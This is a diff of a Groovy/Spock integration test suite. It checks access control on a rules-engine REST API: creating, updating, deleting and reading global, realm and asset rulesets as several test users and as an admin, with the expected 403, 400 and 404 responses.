-            }
-
-    def "Access rules as testuser1"() {
-
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def rulesService = container.getService(RulesService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        and: "some imported rulesets"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
-
-        and: "an authenticated test user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
-
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
-
-        /* ############################################## READ ####################################### */
-
-        when: "the global rules are retrieved"
-        rulesetResource.getGlobalRulesets(null, null, false)
-
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "some realm rules are retrieved"
-        def ruleDefinitions = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
-
-        then: "result should match"
-        ruleDefinitions.length == 1
-        ruleDefinitions[0].name == "Some master realm demo rules"
-
-        when: "some realm rules in a non-authenticated realm are retrieved"
-        rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "some asset rules in a non-authenticated realm are retrieved"
-        rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        /* ############################################## WRITE ####################################### */
-
-        when: "a global rule is created"
-        def ruleDefinition = new GlobalRuleset("Test definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createGlobalRuleset(null, ruleDefinition)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a global rule is updated"
-        rulesetResource.updateGlobalRuleset(null, 1234567890l, ruleDefinition)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a global rule is deleted"
-        rulesetResource.deleteGlobalRuleset(null, 1234567890l)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a realm ruleset is created in the authenticated realm"
-        def realmRuleset = new RealmRuleset(MASTER_REALM, "Test realm definition", Ruleset.Lang.JSON, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-        def rulesetId = rulesetResource.getRealmRulesets(null, MASTER_REALM, null, false)[1].id
-        realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
-        def lastModified = realmRuleset.lastModified
-
-        then: "result should match"
-        realmRuleset.id == rulesetId
-        realmRuleset.version == 0
-        realmRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        realmRuleset.name == "Test realm definition"
-        realmRuleset.rules == "SomeRulesCode"
-        realmRuleset.realm == MASTER_REALM
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
-
-        when: "a realm ruleset is updated"
-        realmRuleset.name = "Renamed test realm definition"
-        realmRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
-        realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
-
-        then: "result should match"
-        realmRuleset.id == rulesetId
-        realmRuleset.version == 1
-        realmRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        realmRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
-        realmRuleset.name == "Renamed test realm definition"
-        realmRuleset.rules == "SomeRulesCodeModified"
-        realmRuleset.realm == keycloakTestSetup.realmMaster.name
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
-
-        when: "a realm ruleset is updated with an invalid realm"
-        realmRuleset.realm = "thisdoesnotexist"
-        rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a realm ruleset is updated with an invalid id"
-        realmRuleset.realm = keycloakTestSetup.realmMaster.name
-        realmRuleset.id = 1234567890l
-        rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a non-existent realm ruleset is updated"
-        rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "a realm ruleset is deleted"
-        rulesetResource.deleteRealmRuleset(null, rulesetId)
-        rulesetResource.getRealmRuleset(null, rulesetId)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
-
-        and: "the ruleset should be removed from the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
-            assert deployment == null
-        }
-
-        when: "a groovy realm ruleset is created"
-        realmRuleset = new RealmRuleset(MASTER_REALM, "Test realm definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is created in a non-authenticated realm"
-        realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", FLOW, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "an asset ruleset is created in the authenticated realm"
-        def assetRuleset = new AssetRuleset(managerTestSetup.smartOfficeId, "Test asset definition", FLOW, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-        rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.smartOfficeId, null, false)[0].id
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-        lastModified = assetRuleset.lastModified
-
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 0
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.name == "Test asset definition"
-        assetRuleset.rules == "SomeRulesCode"
-        assetRuleset.assetId == managerTestSetup.smartOfficeId
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
-        when: "an asset ruleset is updated"
-        assetRuleset.name = "Renamed test asset definition"
-        assetRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 1
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
-        assetRuleset.name == "Renamed test asset definition"
-        assetRuleset.rules == "SomeRulesCodeModified"
-        assetRuleset.assetId == managerTestSetup.smartOfficeId
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
-        when: "an asset ruleset is updated with an invalid asset ID"
-        assetRuleset.assetId = "thisdoesnotexist"
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            true
-        }
-
-        when: "an asset ruleset is updated with an invalid id"
-        assetRuleset.assetId = managerTestSetup.smartOfficeId
-        assetRuleset.id = 1234567890l
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            true
-        }
-
-        when: "a non-existent asset ruleset is updated"
-        rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
-
-        when: "an asset ruleset is deleted"
-        rulesetResource.deleteAssetRuleset(null, rulesetId)
-        rulesetResource.getAssetRuleset(null, rulesetId)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            assert rulesService.assetEngines.get(managerTestSetup.smartOfficeId) == null
-        }
-
-        when: "an asset ruleset is created in a non-authenticated realm"
-        assetRuleset = new AssetRuleset(managerTestSetup.apartment2Id, "Test asset definition", JSON, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+  def "Access rules as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def rulesService = container.getService(RulesService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "some test rulesets have been imported"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
+
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
     }
 
-    def "Access rules as testuser2"() {
+    /* ############################################## READ ####################################### */
 
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def rulesService = container.getService(RulesService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "the global rules are retrieved"
+    def ruleDefinitions = rulesetResource.getGlobalRulesets(null, null, false)
 
-        and: "some imported rulesets"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+    then: "result should match"
+    ruleDefinitions.length == 2
+    ruleDefinitions[0].name == "Some global demo rules"
+    ruleDefinitions[0].lang == GROOVY
+    ruleDefinitions[0].rules == null // Don't retrieve the (large) rules data when getting a list of rule definitions
 
-        and: "an authenticated test user"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser2",
-                "testuser2"
-        )
+    when: "some realm rules are retrieved"
+    ruleDefinitions = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
 
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(RulesResource.class)
+    then: "result should match"
+    ruleDefinitions.length == 1
+    ruleDefinitions[0].name == "Some master realm demo rules"
+    ruleDefinitions[0].lang == GROOVY
 
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
+    when: "some realm rules in a non-authenticated realm are retrieved"
+    ruleDefinitions = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
 
-        /* ############################################## READ ####################################### */
+    then: "result should match"
+    ruleDefinitions.length == 1
+    ruleDefinitions[0].name == "Some building realm demo rules"
+    ruleDefinitions[0].enabled
 
-        when: "the global rules are retrieved"
-        rulesetResource.getGlobalRulesets(null, null, false)
+    when: "some asset rules are retrieved"
+    ruleDefinitions = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
 
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    then: "result should match"
+    ruleDefinitions.length == 1
+    ruleDefinitions[0].name == "Some apartment 2 demo rules"
+    ruleDefinitions[0].lang == GROOVY
+    (ruleDefinitions[0] as AssetRuleset).isShowOnList()
 
-        when: "some realm rules in a non-authenticated realm are retrieved"
-        rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
+    /* ############################################## WRITE ####################################### */
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    when: "global ruleset is created"
+    def globalRuleset = new GlobalRuleset("Test global definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createGlobalRuleset(null, globalRuleset)
+    def rulesetId = rulesetResource.getGlobalRulesets(null, null, false)[2].id
+    globalRuleset = rulesetResource.getGlobalRuleset(null, rulesetId)
+    def lastModified = globalRuleset.lastModified
 
-        when: "some realm rules in the authenticated realm are retrieved by user without rules read role"
-        def rulesets = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
+    then: "result should match"
+    globalRuleset.id == rulesetId
+    globalRuleset.version == 0
+    globalRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    globalRuleset.name == "Test global definition"
+    globalRuleset.rules == "SomeRulesCode"
+    globalRuleset.lang == GROOVY
 
-        then: "no rulesets should be returned"
-        rulesets.length == 0
-
-        when: "some asset rules in the authenticated realm are retrieved by the user without rules read role"
-        rulesets = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
-
-        then: "no rulesets should be returned"
-        rulesets.length == 0
-
-        /* ############################################## WRITE ####################################### */
-
-        when: "a global rule is created"
-        def ruleDefinition = new GlobalRuleset("Test definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createGlobalRuleset(null, ruleDefinition)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a global rule is updated"
-        rulesetResource.updateGlobalRuleset(null, 1234567890l, ruleDefinition)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a global rule is deleted"
-        rulesetResource.deleteGlobalRuleset(null, 1234567890l)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is created in the authenticated realm"
-        def realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is updated"
-        rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is deleted"
-        rulesetResource.deleteRealmRuleset(null, 1234567890l)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is created in a non-authenticated realm"
-        realmRuleset = new RealmRuleset(keycloakTestSetup.realmCity.name, "Test realm definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is created in the authenticated realm"
-        def assetRuleset = new AssetRuleset(keycloakTestSetup.realmBuilding.name, "Test asset definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is updated"
-        rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is deleted"
-        rulesetResource.deleteAssetRuleset(null, 1234567890l)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "a realm ruleset is created in a non-authenticated realm"
-        assetRuleset = new AssetRuleset(keycloakTestSetup.realmCity.name, "Test asset definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.globalEngine.get().deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == globalRuleset.version
     }
 
-    def "Access rules as testuser3"() {
+    when: "a global ruleset is updated"
+    globalRuleset.name = "Renamed test global definition"
+    globalRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateGlobalRuleset(null, rulesetId, globalRuleset)
+    globalRuleset = rulesetResource.getGlobalRuleset(null, rulesetId)
 
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def rulesService = container.getService(RulesService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    then: "result should match"
+    globalRuleset.id == rulesetId
+    globalRuleset.version> 0
+    globalRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    globalRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
+    globalRuleset.name == "Renamed test global definition"
+    globalRuleset.rules == "SomeRulesCodeModified"
 
-        and: "some imported rulesets"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.globalEngine.get().deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == globalRuleset.version
+    }
 
-        and: "an authenticated test user"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
+    when: "a global ruleset is deleted"
+    rulesetResource.deleteGlobalRuleset(null, rulesetId)
+    globalRuleset = rulesetResource.getGlobalRuleset(null, rulesetId)
 
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(RulesResource.class)
+    then: "the result should be not found"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
 
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
+    and: "the ruleset should be removed from the engine"
+    conditions.eventually {
+      assert rulesService.globalEngine.get() != null
+      def deployment = rulesService.globalEngine.get().deployments.get(rulesetId)
+      assert deployment == null
+    }
 
-        /* ############################################## READ ####################################### */
+    when: "a non-existent global ruleset is updated"
+    rulesetResource.updateGlobalRuleset(null, 1234567890l, globalRuleset)
 
-        when: "the global rules are retrieved"
-        rulesetResource.getGlobalRulesets(null, null, false)
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
 
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    when: "a realm ruleset is created in the authenticated realm"
+    def realmRuleset = new RealmRuleset(MASTER_REALM, "Test realm definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+    rulesetId = rulesetResource.getRealmRulesets(null, MASTER_REALM, null, false)[1].id
+    realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
+    lastModified = realmRuleset.lastModified
 
-        when: "some realm rules in a non-authenticated realm are retrieved"
-        rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
+    then: "result should match"
+    realmRuleset.id == rulesetId
+    realmRuleset.version == 0
+    realmRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    realmRuleset.name == "Test realm definition"
+    realmRuleset.rules == "SomeRulesCode"
+    realmRuleset.realm == keycloakTestSetup.realmMaster.name
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
+    }
 
-        when: "some realm rules in the authenticated realm are retrieved by the restricted user"
-        def rulesets = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
+    when: "a realm ruleset is updated"
+    realmRuleset.name = "Renamed test realm definition"
+    realmRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
+    realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
 
-        then: "no rulesets should be returned"
-        rulesets.length == 0
+    then: "result should match"
+    realmRuleset.id == rulesetId
+    realmRuleset.version == 1
+    realmRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    realmRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
+    realmRuleset.name == "Renamed test realm definition"
+    realmRuleset.rules == "SomeRulesCodeModified"
+    realmRuleset.realm == keycloakTestSetup.realmMaster.name
 
-        when: "some asset rules of a protected assigned asset are retrieved"
-        def ruleDefinitions = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment1Id, null, false)
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
+    }
 
-        then: "result should match"
-        ruleDefinitions.length == 1
-        ruleDefinitions[0].name == "Some apartment 1 demo rules"
+    when: "a realm ruleset is updated with an invalid realm"
+    realmRuleset.realm = "thisdoesnotexist"
+    rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
 
-        when: "some asset rules of a protected but not assigned asset are retrieved"
-        rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
 
-        then: "no rulesets should be returned"
-        rulesets.length == 0
+    when: "a realm ruleset is updated with an invalid id"
+    realmRuleset.realm = MASTER_REALM
+    realmRuleset.id = 1234567890l
+    rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
 
-        /* ############################################## WRITE ####################################### */
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
 
-        when: "a global rule is created"
-        def ruleDefinition = new GlobalRuleset("Test definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createGlobalRuleset(null, ruleDefinition)
+    when: "a non-existent realm ruleset is updated"
+    rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
 
-        when: "a global rule is updated"
-        rulesetResource.updateGlobalRuleset(null, 1234567890l, ruleDefinition)
+    when: "a realm ruleset is deleted"
+    rulesetResource.deleteRealmRuleset(null, rulesetId)
+    rulesetResource.getRealmRuleset(null, rulesetId)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
 
-        when: "a global rule is deleted"
-        rulesetResource.deleteGlobalRuleset(null, 1234567890l)
+    and: "the ruleset should be removed from the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
+      assert deployment == null
+    }
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    when: "a realm ruleset is created in a non-authenticated realm"
+    realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+    rulesetId = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)[1].id
+    realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
+    lastModified = realmRuleset.lastModified
 
-        when: "a realm ruleset is created in the authenticated realm"
-        def realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
+    then: "result should match"
+    realmRuleset.id == rulesetId
+    realmRuleset.version == 0
+    realmRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    realmRuleset.name == "Test realm definition"
+    realmRuleset.rules == "SomeRulesCode"
+    realmRuleset.realm == keycloakTestSetup.realmBuilding.name
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
+    }
 
-        when: "a realm ruleset is updated"
-        rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
+    when: "an asset ruleset is created in the authenticated realm"
+    def assetRuleset = new AssetRuleset(managerTestSetup.smartOfficeId, "Test asset definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+    rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.smartOfficeId, null, false)[0].id
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
+    lastModified = assetRuleset.lastModified
 
-        then: "result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 0
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.name == "Test asset definition"
+    assetRuleset.rules == "SomeRulesCode"
+    assetRuleset.assetId == managerTestSetup.smartOfficeId
 
-        when: "a realm ruleset is deleted"
-        rulesetResource.deleteRealmRuleset(null, 1234567890l)
-        rulesetResource.getRealmRuleset(null, 1234567890l)
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
+    }
 
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
+    when: "an asset ruleset is updated"
+    assetRuleset.name = "Renamed test asset definition"
+    assetRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
 
